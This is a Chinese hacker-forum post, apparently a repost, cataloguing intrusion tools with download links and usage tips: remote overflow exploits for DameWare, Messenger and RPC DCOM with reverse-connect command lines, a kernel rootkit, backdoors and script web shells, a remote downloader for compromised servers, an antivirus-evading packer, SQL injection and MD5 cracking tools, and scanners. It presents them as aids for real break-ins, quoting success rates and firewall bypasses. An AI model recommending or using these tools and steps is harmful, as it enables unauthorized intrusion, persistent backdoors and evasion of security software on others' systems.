(注:以下程序是网上收集到的,适合自己的使用习惯和思维方式,成功率都很高,并不是网络上常见的空谈,也不是大而全,而且很多程序可以从网络上隐蔽的地方收集到,一些未公布漏洞的exp也没有涉及,如果大家有个好的入侵思路,下面的东西在你实际入侵的时候,一定能给你带来很大的方便!顺附简单实用的说明。)
攻击程序
1,darewere远程溢出程序。
http://www.hacker.com.cn/down/DameWare.rar(暂不能下,去别处找找)
特征断口6129,darewere远程控制控制程序溢出工具,命令格式是:
DameWare.exe
反向连接,需要有外网ip,溢出后在本地用nc监听端口,普通防火墙能饶过。
2,Messenger远程溢出程序。
http://www.hacker.com.cn/down/MsgHack.rar(暂不能下,去别处找找)
Messenger服务溢出程序,对服务器没有太大的作用,对普通客户机成功率比较高,考虑到危害的问题,此版本只能针对xp+sp1,不能攻击2000,命令格式是:
MsgHack -h 192.168.0.1 -v 3 -l 1 -s 1 -r 192.168.0.5 -p 99
同样是反向连接,成功率为60%以上。
3,Retina RPC DCOM scan +RPC 图形界面溢出程序。
http://www.hacker.com.cn/down/rpc.rar
retina的扫描加攻击程序,现在对外网几乎不能成功,对入侵服务器或者是网关后的渗透有非常好的效果!个人发现内网有90%可以成功!
后门木马
1,内核级rootkit:hxdef100
http://www.hacker.com.cn/down/hxdef100.zip
参数有点多,单纯使用并没有太大的优点,只能实现端口复用和简单的shell,但是别忽略了他的功能!如果配合功能强大的后门,那将是非常厉害的!!(注意:hxdef100.exe是主程序,千万不能自己运行,不然清除就麻烦了!请详细看说明,不建议新手使用!)
2,wineggdropshell
http://www.hacker.com.cn/down/wineggdropshell.rar
功能非常强大的后门程序!配置简单方便,可自定义端口,实现常见的安全检测,相当于一个工具箱。(强烈建议配合hxdef使用!)
3,TFTPD
http://www.hacker.com.cn/down/tftpd.rar
由lilo提供的TFTP程序,可自己修改一些配置,在入侵后shell下传输数据比较方便。
4,脚本后门
http://www.hacker.com.cn/down/脚本后门.rar
包含cmd.cgi、cmd.pl、lpmm.asp、phpshell.php,短小精干的脚本后门程序,用于SQL注入并上传程序后控制服务器和提升权限。由臭要饭的!提供。
5,iget
http://www.hacker.com.cn/down/iget.rar
小骗子的iget脚本,上传到服务器然后运行,可下载预定义网页路径的程序,然后用某种方法运行,功能单一,非常适合入侵。
6,SQL综合利用工具
http://www.hacker.com.cn/down/SQLTools.rar
由“蓝色凯博”CEO发哥编写的SQL利用程序,能实现非常强大的功能,可利用数据库的存储过程实现非常多的功能,是SQL入侵中不可多得的好东东。
7,remoxec
http://www.hacker.com.cn/down/remoxec.zip
没有3389,没有ipc$,没有连接方式,只知道对方的帐户和密码,如何连接,如何进一步入侵?使用这个工具就可以实现连接并运行的目的。(需要rpc支持!)
8,幻影
http://www.hacker.com.cn/down/幻影.rar
用于木马或者后门的加壳,对国内杀毒软件和安全程序能比较好的躲开,但是很多次实验后发现国外的服务器上的那些安全程序能杀。
脚本相关
1,access注入程序
http://www.hacker.com.cn/down/Creak.rar
用于发现SQL注入漏洞后的自动破解,程序不是很稳定,多试几次。
2,md5解码器http://www.hacker.com.cn/down/md5解码器.rar
md5的暴力破解程序,使用简单方便,时间+运气=成功破解。
3,access注入程序2
http://www.hacker.com.cn/down/nbsi.rar
全自动的access注入程序,功能不错,内有注册码。
扫描程序
1,Fluxay5
http://www.hacker.com.cn/down/Fluxay5.rar
这个不用多说了,流光5。
2,xscan3
http://www.hacker.com.cn/down/xscan3.rar
也不废话了,可升级的xscan3.0。
(DVOL本文转自:中国DV传媒 http://www.dvol.cn)